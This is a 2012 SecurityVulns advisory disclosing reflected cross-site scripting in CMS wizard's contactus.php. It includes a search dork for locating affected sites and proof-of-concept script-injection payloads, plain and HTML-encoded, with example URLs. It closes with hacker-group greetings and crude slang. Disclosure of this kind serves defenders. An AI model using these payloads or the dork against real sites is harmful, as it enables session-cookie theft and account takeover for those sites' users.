CMS wizard Cross Site Scripting

2012-02-22T00:00:00
ID SECURITYVULNS:DOC:27694
Type securityvulns
Reporter Securityvulns
Modified 2012-02-22T00:00:00

Description

================================================================= -=CMS wizard Cross Site Scripting =================================================================

Author: XaDaL

Date: 14-02-2012

vendor: http://www.cmswizard.co.uk/

tested on: windows mobile

dork : powered by CMS wizard

This vulnerability affects /contactus.php.

The impact of this vulnerability

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

Attack details

URI was set to "><script>alert(document.cookie)</script>

or

           &quot;&gt;&lt;script&gt;alert&#40;/XaDaL_GantenG/&#41;&lt;/script&gt;

or other

=XSS=

http://localhost/contactus.php/"><script>alert(document.cookie)</script>

http://localhost/contactus.php/"><script>alert(/XaDaL_GantenG/)</script>

!#GREETZ: kamtiez , 1bli3z , tukulesto , hakz , jundab ,boebefa ,ryan aby , albert wired ,dr.CruzZ xr0b0t , red r0b0t,El-Farhatz,s1do3l,virgi maho. dan semua yang gak bisa aku sebutin satu-satu (o,0)v

all member magelangcyber , indonesiancoder , codenesia,kill-9,MC-crew.

and aya i love you full :*

Bogel & dicka cyber: kapan-kapan ngopi bareng lagi gan =))

Happy fvcklentine...

umbar-umbar titit hhhhhhhhhh :p